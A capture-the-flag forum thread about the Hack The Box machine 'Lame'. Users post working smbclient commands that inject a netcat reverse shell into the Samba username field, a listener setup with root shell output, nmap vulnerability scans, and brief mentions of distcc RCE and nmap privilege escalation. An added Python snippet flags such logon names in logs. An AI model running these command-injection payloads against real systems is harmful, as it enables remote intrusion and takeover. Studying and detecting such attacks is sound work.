Lame write-up by Arrexel

Can you please provide the “manual exploitation (exploit db exploit) process” as well for all of your tutorials??

@goutsou said:
Can you please provide the “manual exploitation (exploit db exploit) process” as well for all of your tutorials??

Yea I will be adding that to them all from now on, will fix lame/legacy after I finish my next one.

Awesome thanks @Arrexel

@alamot said:
And for those who like to do things manually or they aren’t allowed to use metasploit:
smbclient -U "/=\`nohup nc -e /bin/sh LHOST LPORT\`" -N -I 10.10.10.3 //LAME/tmp

Thanks for the tip and thanks @Arrexel for the tutorials! I had been trying to manually make it work without luck.

The metasploit module seems to use an smb client implementation that sets up the session without ntlm. I can’t seem to find the switch on smbclient that allows me to simulate that handshake (NT LANMAN 1.0), and have tried all max-protocol options.

I’m simply trying to ping my machine before getting onto the reverse shell part but I can’t seem to trigger the payload, can you please confirm if your command above works for you?

Thanks and keep up the good work guys :slight_smile:

ps. I’m aware the displayed command is HTML encoded

@ps3tsuneo Those html entities didn’t show up before. Anyway I uploaded the commands here (I had tested them and they worked): https://github.com/Alamot/code-snippets/blob/master/hacking/HTB/Lame/lame.txt

@alamot said:
@ps3tsuneo Those html entities didn’t show up before. Anyway I uploaded the commands here (I had tested them and they worked): https://github.com/Alamot/code-snippets/blob/master/hacking/HTB/Lame/lame.txt

Thanks a lot @alamot! I did manage to make it work yesterday. Don't know if the problem was with my setup, but in case it helps others, I did have to tweak the smbclient settings a bit to disable spnego.

Also had to modify the command a bit to add a "." at the beginning (smbclient -U "./=\`nohup nc -e /bin/sh LHOST LPORT\`" -N -I 10.10.10.3 -p 139 //LAME/tmp)

Thanks for your quick reply!

@SirenCeol said:
Nice write up @Arrexel, you can also do this to pinpoint and see if it is vulnerable to smb vulns:
nmap -T4 -sS -sC -Pn -A --script smb-vuln* 10.10.10.3

This one returns:
Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: false

why?

@ps3tsuneo said:
Thanks a lot @alamot! I did manage to make it work yesterday. Don't know if the problem was with my setup, but in case it helps others, I did have to tweak the smbclient settings a bit to disable spnego.

Also had to modify the command a bit to add a "." at the beginning (smbclient -U "./=\`nohup nc -e /bin/sh LHOST LPORT\`" -N -I 10.10.10.3 -p 139 //LAME/tmp)

Thanks for your quick reply!

Can you please explain how you disabled spnego?
--option="client use spnego = no" is not working here

I disabled it in /etc/samba/smb.conf, rebooted Kali and still not working

I am new, so sorry if this is too noob of a question.

msf's smb/pipe_auditor module shows me different output than what you have in the write-up. Here’s what it looks like.

msf auxiliary(scanner/smb/pipe_auditor) > run

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(scanner/smb/pipe_auditor) >

What am I doing wrong here?
Thanks.

"client use spnego = no" in the smb.conf file does not work for me either… the result of the connection is the following:

session request ok
negotiated dialect[NT1] against server[10.10.10.3]
NT1 login failed: NT_STATUS_LOGON_FAILURE
session setup failed: NT_STATUS_LOGON_FAILURE

If no "client use spnego = no" setting is set, the result is:

gensec_update_done: ntlmssp[0x16ddf20]: NT_STATUS_OK tevent_req[0x16dbe40/…/auth/ntlmssp/ntlmssp.c:181]: state[2] error[0 (0x0)] state[struct gensec_ntlmssp_update_state (0x16dbf20)] timer[(nil)] finish[…/auth/ntlmssp/ntlmssp.c:222]
gensec_update_done: spnego[0x16dd440]: NT_STATUS_MORE_PROCESSING_REQUIRED tevent_req[0x16ddad0/…/auth/gensec/spnego.c:1601]: state[2] error[0 (0x0)] state[struct gensec_spnego_update_state (0x16ddbb0)] timer[(nil)] finish[…/auth/gensec/spnego.c:2070]
SPNEGO login failed: The attempted logon is invalid. This is either due to a bad username or authentication information.
session setup failed: NT_STATUS_LOGON_FAILURE

Ok, found another (almost the same) manual way which worked for me:

Setup listener:

~# nc -nvlp LPORT

Connect to the Lame using Smbclient:

~# smbclient //10.10.10.3/tmp
Enter WORKGROUP\root's password: {Hit Enter}
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> 

Execute payload within SMB session:

smb: \> logon "./=`nohup nc -e /bin/sh LHOST LPORT`"
Password: {Hit Enter}

Done. You should receive the connection to your listener:

listening on [any] 4444 ...
10.10.10.3: inverse host lookup failed: Unknown host
connect to [10.10.XX.XX] from (UNKNOWN) [10.10.10.3] 57347
ls /root/
Desktop
reset_logs.sh
root.txt
vnc.log
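From the defender's side, as an added example that is not part of any post in this thread: a small Python check that scans Samba authentication log lines for logon names carrying shell metacharacters, the shape of the smbclient -U and logon commands discussed above. The log lines are constructed samples modelled on Samba's check_ntlm_password failure messages, and the username field is assumed to sit between "Authentication for user [" and "] -> [".

```python
import re

# Constructed sample log lines (not captured from a real host), shaped like
# Samba's check_ntlm_password failure messages with the logon name in brackets.
SAMPLE_LOG = """\
[2019/03/01 10:00:01,  2] auth/auth.c:319(check_ntlm_password)  check_ntlm_password:  Authentication for user [guest] -> [guest] FAILED with error NT_STATUS_NO_SUCH_USER
[2019/03/01 10:00:02,  2] auth/auth.c:319(check_ntlm_password)  check_ntlm_password:  Authentication for user [./=`nohup nc -e /bin/sh LHOST LPORT`] -> [./=`nohup nc -e /bin/sh LHOST LPORT`] FAILED with error NT_STATUS_NO_SUCH_USER
[2019/03/01 10:00:03,  2] auth/auth.c:319(check_ntlm_password)  check_ntlm_password:  Authentication for user [alice] -> [alice] FAILED with error NT_STATUS_WRONG_PASSWORD
"""

# Shell metacharacters that have no business in a logon name: backtick,
# dollar, pipe, semicolon, ampersand and redirection operators.
SUSPICIOUS = re.compile(r"[`$|;&<>]")

# Assumed field layout: the attempted logon name is the first bracketed value.
USER_FIELD = re.compile(r"Authentication for user \[(.*?)\] -> \[")


def suspicious_logons(log_text):
    """Return (line_number, logon_name) for every authentication line whose
    logon name contains shell metacharacters. Lines without the expected
    field are skipped rather than flagged."""
    hits = []
    for number, line in enumerate(log_text.splitlines(), 1):
        match = USER_FIELD.search(line)
        if match and SUSPICIOUS.search(match.group(1)):
            hits.append((number, match.group(1)))
    return hits


if __name__ == "__main__":
    for number, name in suspicious_logons(SAMPLE_LOG):
        print(f"line {number}: suspicious logon name {name!r}")
```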

@SirenCeol said:
Nice write up @Arrexel, you can also do this to pinpoint and see if it is vulnerable to smb vulns:
nmap -T4 -sS -sC -Pn -A --script smb-vuln* 10.10.10.3

The aggressive scan from Nmap (also known as -A) is the same thing as -sC -sV --traceroute, but it may change in the future (according to the Nmap docs). So you do not need to specify -sC on the command line when -A is present.

You could also use RCE on port 3632 and get a user this way. I did privesc with firefart but I’m sure there are many other ways to get root.

Hey! I am not getting any results by the Nmap command. It says that the host is down, if it is up then use -Pn. I used that too but not getting anything. I am doing this for the first time. Do we have to use any VPN (from Access tab of HTB) to do this? I am on a Wi-Fi.

Are you able to reach other IPs? If not, then it's a VPN issue. Are you a VIP member?
Reset the box and try…

I am able to reach any IPs outside HTB by nmap. When I try to probe any IP inside HTB retired machines, it fails.
I just straightaway started firing nmap on 10.10.10.3 from my terminal. I am playing as an individual and not a participant of any lab. Is there some pre-configuration that I need to do in HTB or my local machine?

@Nofix said:

You could also use RCE on port 3632 and get a user this way. I did privesc with firefart but I’m sure there are many other ways to get root.

I also used the MSF exploit for port 3632; later I used nmap --interactive

@azasdf74M said:

I also used the MSF exploit for port 3632; later I used nmap --interactive

I used an nmap script for RCE and then uploaded a shell via wget RCE and spotted the nmap issue right away.